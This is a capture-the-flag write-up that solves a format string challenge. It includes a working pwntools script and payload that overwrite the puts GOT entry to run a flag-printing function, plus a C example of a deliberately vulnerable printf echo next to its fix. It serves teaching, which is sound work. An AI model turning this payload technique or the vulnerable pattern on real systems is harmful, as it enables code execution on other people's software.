Description
Exploit the service to get the flag.
Files
Enumeration
checksec shows that THERE ARE NO MITIGATIONS AT ALL.

When you run the program, it repeats what you typed.

Static Analysis
With Binary Ninja we can check out where it reads and prints our input.
We can see that printf is not given a format string of its own: our input is passed directly as the format string. This is a format string vulnerability.

Also, there is a handy function, flaggy, that runs “cat flag.txt”.

Solution
Since the binary is Partial RELRO with No PIE, we can simply overwrite the GOT entry of puts with the address of flaggy.
```python
#!/usr/bin/python2.7
from pwn import *

isLocal = True
if isLocal:
    p = process("./nra")
else:
    p = remote("95.216.233.106", 25480)

elf = ELF("./nra")
GOT_PUTS = elf.got['puts']       # writable because the binary is only Partial RELRO
FUNC_FLAGGY = elf.sym['flaggy']  # fixed address because there is no PIE

p.recvline()
print(hex(FUNC_FLAGGY))  # 0x08049245

# Two %hn writes: the high half 0x0804 goes to puts.got+2, the low half 0x9245 to puts.got.
# Bytes printed before the first %hn: 12 (addresses + filler) + 8 + 8 + 2024 = 2052 = 0x0804.
# Bytes printed before the second %hn: 2052 + 35393 = 37445 = 0x9245.
p.sendline(p32(GOT_PUTS + 2) + "@@@@" + p32(GOT_PUTS) + "%.8x%.8x%.2024x%hn%.35393x%hn")
p.readline()
p.readline()
print(p.readline())
```
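As an added illustration, not the challenge binary's code, here is the bug class the analysis above describes: an echo routine that hands user input to printf as the format string, beside the corrected form. The input "100%%" is a constructed sample, chosen because "%%" is the one directive that consumes no argument, so the difference between the two routines is deterministic.

```c
#include <stdio.h>
#include <string.h>

/* Buggy echo: the user-controlled string becomes the format string, so any
 * '%' directive in it is interpreted by printf instead of being echoed.
 * Compiling with -Wformat-security (or -Werror=format-security) flags this
 * exact call, which is the cheapest detection for this bug class. The GOT
 * overwrite used in the solution is separately blocked by linking with
 * Full RELRO (-Wl,-z,relro,-z,now), which makes the GOT read-only. */
void echo_vulnerable(const char *input, char *out, size_t outlen)
{
    snprintf(out, outlen, input);
}

/* Fixed echo: a constant format string; the input is only ever data. */
void echo_fixed(const char *input, char *out, size_t outlen)
{
    snprintf(out, outlen, "%s", input);
}

/* Returns 1 when the buggy routine altered the text, i.e. when the input
 * was interpreted as a format string rather than echoed verbatim. */
int format_string_interpreted(const char *input)
{
    char buggy[64], fixed[64];
    echo_vulnerable(input, buggy, sizeof buggy);
    echo_fixed(input, fixed, sizeof fixed);
    return strcmp(buggy, fixed) != 0;
}

/* Returns 1 when the fixed routine reproduces the input byte for byte. */
int fixed_preserves_input(const char *input)
{
    char fixed[64];
    echo_fixed(input, fixed, sizeof fixed);
    return strcmp(fixed, input) == 0;
}

int main(void)
{
    const char *sample = "100%%";   /* constructed input */
    char out[64];
    echo_vulnerable(sample, out, sizeof out);
    printf("vulnerable: %s\n", out);  /* prints "100%" */
    echo_fixed(sample, out, sizeof out);
    printf("fixed:      %s\n", out);  /* prints "100%%" */
    return 0;
}
```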